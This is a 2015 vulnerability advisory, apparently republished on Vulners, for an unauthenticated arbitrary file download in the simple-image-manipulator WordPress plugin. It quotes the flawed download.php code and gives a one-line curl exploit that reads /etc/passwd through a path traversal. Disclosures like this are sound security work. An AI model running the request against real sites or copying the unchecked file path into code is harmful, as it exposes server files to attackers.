Title: Remote file download in simple-image-manipulator v1.0 wordpress plugin
Author: Larry W. Cashdollar, @_larry0
Date: 2015-07-16
Download Site: https://wordpress.org/plugins/simple-image-manipulator
Vendor: https://profiles.wordpress.org/kevartpatel/
Vendor Notified: 2015-07-16
Vendor Contact: [email protected]
Description: Manipulate your wordpress images using slider and tickboxes.
Vulnerability:
In ./simple-image-manipulator/controller/download.php no checks are made to authenticate user or sanitize input when determining file location:
14 /* Figure out the MIME type | Check in array */
15 $known_mime_types=array(
16 "pdf" => "application/pdf",
17 "txt" => "text/plain",
18 "html" => "text/html",
19 "htm" => "text/html",
20 "exe" => "application/octet-stream",
21 "zip" => "application/zip",
22 "doc" => "application/msword",
23 "xls" => "application/vnd.ms-excel",
24 "ppt" => "application/vnd.ms-powerpoint",
25 "gif" => "image/gif",
26 "png" => "image/png",
27 "jpeg"=> "image/jpg",
28 "jpg" => "image/jpg",
29 "php" => "text/plain"
30 );
31
32 if($mime_type==''){
33 $file_extension = strtolower(substr(strrchr($file,"."),1));
34 if(array_key_exists($file_extension, $known_mime_types)){
35 $mime_type=$known_mime_types[$file_extension];
36 } else {
37 $mime_type="application/force-download";
38 };
39 };
CVEID:
OSVDB:
Exploit Code:
• curl -sk "http://server/wp-content/plugins/./simple-image-manipulator/controller/download.php?filepath=/etc/passwd"Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation